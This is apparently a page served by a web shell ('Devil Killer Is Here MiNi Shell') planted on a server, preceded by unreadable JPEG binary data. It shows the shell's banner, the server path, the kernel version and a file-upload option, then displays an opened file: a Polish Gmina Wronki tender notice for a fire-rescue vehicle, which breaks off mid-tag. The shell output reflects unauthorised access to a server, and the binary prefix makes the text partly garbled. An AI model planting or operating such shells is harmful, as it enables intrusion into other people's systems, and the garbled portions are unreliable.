JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220414/0012334502-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup samochodu ratowniczo-gaśniczego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WRONKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791460</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ratuszowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wronki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-510</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wronki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wronki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup samochodu ratowniczo-gaśniczego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-369b03a9-bbeb-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00123345</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00030210/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup samochodu średniego, ratowniczo-gaśniczego dla OSP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/wronki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/wronki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie platformazakupowa.pl, zwanym<br/>dalej„regulaminem”,dostępnym na stronie głównej platformy. Rejestracja i korzystanie z Platformy jest bezpłatne.Dokonując<br/>rejestracji Wykonawca akceptuje regulamin korzystania z Platformy. W postępowaniu o udzielenie zamówienia komunikacja między<br/>Zamawiającym a Wykonawcami, w<br/>szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji (np. zadawanie pytań,uzupełnianie oświadczeń<br/>lub dokumentów na wezwanie Zamawiającego) odbywa się elektronicznie za pośrednictwem strony internetowej<br/>platformazakupowa.pl i formularza Wyślij<br/>wiadomość dostępnego na stronie dotyczącej prowadzonego postępowania. Zamawiający dopuszcza, opcjonalnie,komunikację za<br/>pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu<br/>zWykonawcami:przetargi@wronki.pl. Zamawiający będzie przekazywał<br/>wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi napytania,zmiany specyfikacji,<br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja,<br/>której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem<br/>platformazakupowa.pl do konkretnego wykonawcy. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania<br/>komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.Oferta,oświadczenia lub inne dokumenty wymagane przez<br/>Zamawiającego składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym<br/>lub podpisem osobistym. W procesie składania oferty, na<br/>platformie,kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis<br/>osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.<br/>Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. Zamawiający rekomenduje wykorzystanie<br/>formatów: .pdf .doc .docx .xls .xlsx<br/>.jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie<br/>jednego z rozszerzeń:.zip,.7Z. Wśród rozszerzeń powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif.bmp<br/>.numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.Zamawiający zwraca uwagę na ograniczenia wielkości plików<br/>podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB,<br/>oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi<br/>maksymalnie 5MB.Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób,stosować podpisy tego samego<br/>rodzaju. Podpisywanie różnymi<br/>rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. Pozostałe wymagania<br/>zostały określone w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Burmistrz Miasta<br/>i Gminy Wronki, ul. Ratuszowa 5, 64-510 Wronki. Kontakt z administratorem jest możliwy także za<br/>pomocą adresu mailowego: poczta@wronki.pl.<br/>2. Inspektorem Ochrony Danych Osobowych jest Aleksandra Cnota-Mikołajec. Kontakt z inspektorem jest możliwy za pomocą<br/>adresów mailowych:aleksandra@eduodo.pl lub iod@eduodo.pl.<br/>3. Dane osobowe przetwarzane będą w celach związanych z postępowaniem o udzielenie zamówienia<br/>publicznego na podstawie art. 6 ust. 1lit. c RODO w związku z realizacją obowiązku prawnego ciążącego na administratorze,<br/>wynikającego z ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, a także na podstawie ustawy zdnia27<br/>sierpnia2009 r. o finansach publicznych oraz ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej.<br/>4. Odbiorcami danych osobowych mogą być: a)osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania zgodnie z ustawą Pzp,<br/>b) organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej,w<br/>zakresie i w celach, które wynikają z przepisów powszechnie<br/>obowiązującego prawa c)inne podmioty,które na podstawie stosownych umów przetwarzają dane<br/>osobowe administratora.<br/>5.Dane osobowe przechowywane będą przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. Jeśli czas trwania umowy przekracza 4<br/>lata,zamawiający przechowuje umowę przez cały czas trwania umowy.<br/>6.Dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych.<br/>7.Prawo żądania od Administratora: a) dostępu do swoich danych oraz otrzymania ich pierwszej kopii.Administrator dostarcza<br/>osobie, której dane dotyczą, kopię danych osobowych, które podlegają przetwarzaniu. Za wszelkie kolejne kopie, o które zwróci się<br/>osoba, której dane dotyczą, administrator może pobrać opłatę w rozsądnej wysokości,wynikającej b) z kosztów<br/>administracyjnych.Jeśli wykonanie wyżej wymienionego obowiązku wymagałoby niewspółmiernie dużego wysiłku,zamawiający może<br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji, mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego,c) do sprostowania swoich<br/>nieprawidłowych danych osobowych lub uzupełnienia swoich niekompletnych danych osobowych. Skorzystanie z tego prawa nie<br/>może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp. d) do usunięcia danych osobowych wyłącznie na podstawie art. 17 RODO,e) do ograniczenia<br/>przetwarzania danych osobowych na<br/>podstawie art. 18RODO. Prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego, f) do wniesienia sprzeciwu wobec przetwarzania danych,<br/>jeśli nie występują prawnie uzasadnione podstawy przetwarzania i na zasadach opisanych wart. 21 RODO, g) do przenoszenia<br/>danych, zgodnie z art. 20RODO, h) prawo do wniesienia skargi do organu nadzorczego, W celu skorzystania oraz uzyskania<br/>informacji dotyczących praw określonych powyżej (lit. a-g) należy<br/>skontaktować się z Administratorem lub z Inspektorem Danych Osobowych. 8.Prawo wniesienia skargi do organu nadzorczego<br/>(Urząd Ochrony Danych Osobowych, ul. Stawki 2,00-193 Warszawa.<br/>9.Podanie danych osobowych jest wymogiem ustawowym. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>10.Dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NIiPP.271.13.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 174796,70 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia obejmuje zakup samochodu ratowniczo-gaśniczego, typu GBA, dla Ochotniczej Straży Pożarnej w Kłodzisku. <br/>1)	Samochód ratowniczo-gaśniczy, typu GBA musi spełniać następujące wymagania podstawowe: <br/>a)	Rok produkcji: nie starszy niż 2002, <br/>b)	Napęd: 4x2 z blokadą mostu tylnego lub 4x4,<br/>c)	Podwozie typu miejskiego, koła na tylnej osi podwójne, <br/>d)	Moc silnika: minimum 150 KM, <br/>e)	Skrzynia biegów: manualna, <br/>f)	DMC: min. 12000 kg, <br/>g)	Przebieg: maksymalnie do 50.000 km, <br/>h)	Stan techniczny oraz wizualny co najmniej dobry, zadowalający stronę kupującą (warunek zakupu), <br/>i)	Pojazd musi być bezwypadkowy oraz bez uszkodzeń mechanicznych, pojazd musi posiadać powłokę lakierniczą w kolorze czerwieni sygnałowej RAL 3000,<br/>j)	Pojazd nie przerabiany oryginalnie przystosowany do ruchu prawostronnego, <br/>k)	Pojazd zarejestrowany na terytorium RP jako samochód specjalny, pożarniczy, uprzywilejowany, pojazd musi być w podziale jednostki ochrony przeciwpożarowej na terenie RP i musi być wpisany do systemu SWD PSP lub posiadać aktualne świadectwo dopuszczenia CNBOP-PIB, lub aktualną opinię techniczną CNBOP-PIB,<br/>l)	Kabina musi być przystosowana do przewozu minimum 6 osób, w układzie 1+1+4, <br/>m)	Pojazd musi posiadać oryginalną zabudowę pożarniczą zainstalowaną od nowości, <br/>n)	Pojazd musi być wyposażony w autopompę o wydajności minimum 1600l/min napędzaną przez przystawkę wyjścia mocy, <br/>o)	Pojazd musi być wyposażony w zbiornik kompozytowy lub metalowy wody o pojemności minimum 2000 l z falochronami i włazem rewizyjnym, zbiornik środka pianotwórczego minimum 200 l,<br/>p)	Całkowita wysokość w najwyższym punkcie zabudowy samochodu nie może przekroczyć 3,1m.<br/>2)	Pojazd musi spełniać wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych, zgodnie z ustawą z dnia 20 czerwca 1997 r. &#34;Prawo o ruchu drogowym&#34; (Dz. U. z 2021 poz. 450). <br/>3)	Wymagania szczegółowe (kabina):<br/>a)	kabina załogowa musi być wykonana w technologii jednomodułowej z czterema drzwiami otwieranymi na obie strony pojazdu,<br/>b)	kabina musi być przystosowana do przewozu minimum 6 osób, w układzie 1+1+4, <br/>c)	kabina musi posiadać otwierane szyby co najmniej w przedniej części załogowej,<br/>d)	kabina musi być wyposażona w niezależny system ogrzewania postojowego,<br/>e)	kabina musi być wykończona materiałami łatwo zmywalnymi,<br/>f)	kabina musi posiadać tylne siedzenia, uchylne, przodem do kierunku jazdy,<br/>g)	kabina musi być wyposażona w stopnie wejściowe wykonane w systemie antypoślizgowym,<br/>h)	kabina musi być wyposażona w oświetlenie wewnętrzne, w tym niezależne dla dowódcy,<br/>i)	kabina musi być wyposażona w radio samochodowe,<br/>j)	kabina musi być wyposażona w kompletną instalację do podłączenia radiostacji przewoźnej (zasilanie +12V oraz instalacja antenowa)<br/>4)	Wymagania szczegółowe (zabudowa pożarnicza):<br/>a)	pojazd musi posiadać oryginalną zabudowę pożarniczą zainstalowaną od nowości,<br/>b)	poszycie zewnętrzne musi być wykonane w całości z aluminium,<br/>c)	pojazd musi posiadać minimum po trzy skrytki sprzętowe z prawej i lewej strony pojazdu,<br/>d)	pojazd musi posiadać skrytkę przedziału pompowego w tylnej części pojazdu,<br/>e)	skrytki sprzętowe oraz pompowa muszą być zamykane żaluzjami aluminiowymi,<br/>f)	żaluzje skrytkowe muszą posiadać system wspomagający otwarcie oraz<br/>g)	zapobiegający niekontrolowanemu zamknięciu,<br/>h)	żaluzje skrytkowe muszą posiadać uszczelki boczne bryzo i pyłoszczelne,<br/>i)	skrytki sprzętowe muszą być w całości wykonane z materiałów odpornych na korozję,<br/>j)	skrytki sprzętowe muszą być wykończone blachą aluminiową lub kwasodoporną,<br/>k)	skrytki sprzętowe muszą być przystosowane do przewożenia węży tłocznych oraz armatury wodno-pianowej,<br/>l)	konstrukcja skrytek musi zapewniać odprowadzanie wody z ich wnętrza,<br/>m)	dach pojazdu musi być wykonany w formie podestu użytkowego wyłożonego blachą aluminiową ryflowaną lub innym materiałem antypoślizgowym,<br/>n)	na dachu pojazdu musi znajdować się uchwyt na drabinę DW10 lub nasadkową, podest dachowy musi posiadać balustradę ochronną, wykonaną z materiałów odpornych na korozję, wykonaną jako nierozłączną część z zabudową,<br/>o)	z tyłu nadwozia musi znajdować się drabinka wejściowa na podest dachowy.<br/>5)	Wymagania szczegółowe (instalacja wodna):<br/>a)	pojazd musi być wyposażony w autopompę o wydajności minimum 1600l/min napędzaną przez przystawkę wyjścia mocy,<br/>b)	pojazd musi być wyposażony w zbiornik kompozytowy lub metalowy wody o pojemności minimum 2000 l z falochronami i włazem rewizyjnym,<br/>c)	zbiornik wody musi być wyposażony w instalację napełniania ze źródła zewnętrznego,<br/>d)	zbiornik wody musi być wyposażony w instalację przelewową oraz instalację umożliwiającą grawitacyjne opróżnianie,<br/>e)	zbiornik środka pianotwórczego o pojemności min 200l,<br/>f)	układ wodny musi być wyposażony w co najmniej 1 linię ssawną zakończoną nasadą W110,<br/>g)	instalacja tłoczna z autopompy musi posiadać minimum 2 nasady W75,<br/>h)	instalacja tłoczna musi być wyposażona w linię szybkiego natarcia wraz z wężem o długości min 30m,<br/>i)	pojazd musi posiadać działko wodno-pianowe na dachu pojazdu,<br/>j)	przedział pompowy musi być wyposażony w niezależny układ ogrzewania postojowego,<br/>k)	przedział pompowy musi być wyposażony w układ sterowania pracą autopompy wyposażony w miernik poziomu środków gaśniczych, regulator obrotów silnika, manometr ciśnienia podawania oraz manowakuometr ciśnienia ssania,<br/>l)	przedział pompowy musi być wyposażony w awaryjny wyłącznik silnika pojazdu „STOP”,<br/>6)	Wymagania szczegółowe (instalacja elektryczna):<br/>a)	pojazd musi posiadać instalacje elektryczną 24V,<br/>b)	pojazd musi posiadać główny wyłącznik prądu,<br/>c)	pojazd musi posiadać oświetlenie schowków sprzętowych wewnątrz,<br/>d)	pojazd musi posiadać minimum 5-punktowe oświetlenie robocze pola pracy w obrębie pojazdu, w tym lampy oświetlające teren wokół kabiny załogi,<br/>e)	pojazd musi posiadać sygnał cofania z białą lampą, <br/>f)	pojazd musi posiadać lampy obrysowe i boczne,<br/>g)	pojazd musi być wyposażony w sygnalizację świetlną pojazdu uprzywilejowanego w skład której musi wchodzić: lampy ostrzegawcze, co najmniej jedna lampa ostrzegawcza z tylu na zabudowie, zestaw lamp naprzemiennych na masce lub zderzaku pojazdu,<br/>h)	pojazd musi być wyposażony w sygnalizację dźwiękową pojazdu uprzywilejowanego: modulator sygnałów ostrzegawczych z manipulatorem umiejscowionym w zasięgu pracy kierowcy, głośnik sygnałów ostrzegawczych, zestaw rozgłoszeniowy,<br/>7)	Wymagania szczegółowe (dodatkowe wyposażenie): pojazd wyposażony w pneumatycznie podnoszony minimum 2 sekcyjny, aluminiowy maszt oświetleniowy z głowicą świetlną halogenową o mocy minimum 4x250W lub równoważny.<br/>8)	Zamawiający dokona sprawdzenia stanu technicznego pojazdu oraz kontroli sprawności zamontowanych <br/>na nim urządzeń. W przypadku stwierdzenia złego stanu technicznego pojazdu oraz niezgodności faktycznych parametrów i wyposażenia z wymaganiami określonymi w niniejszym postępowaniu i złożonej przez Wykonawcę ofercie - Zamawiający odstąpi od zakupu przedmiotu zamówienia. <br/>9)	Zamawiający zapozna się ze stanem technicznym pojazdu niezwłocznie, po dokonaniu wyboru oferty, jednak nie później niż w dniu podpisania umowy. W tym celu w imieniu Zamawiającego czynności odbiorowych dokona komisja powołana przez Zamawiającego spośród przedstawicieli OSP Kłodzisko i Gminy Wronki.<br/>10)	Protokolarny odbiór samochodu odbędzie się w siedzibie Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiajmy udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów odnoszących się do przedmiotu zamówienia publicznego.<br/>2. Ocenie ofert podlegają tylko oferty niepodlegające odrzuceniu.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, który spełnia wymagane warunki oraz którego oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych, spełnia wymagania określone w specyfikacji warunków zamówienia i uzyska najwyższą ilość punktów w oparciu o podane kryteria wyboru. Maksymalna liczba punktów jaką może uzyskać Wykonawca wynosi – 100%, tj. 100 pkt. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wyciągarka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Napęd 4/4</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 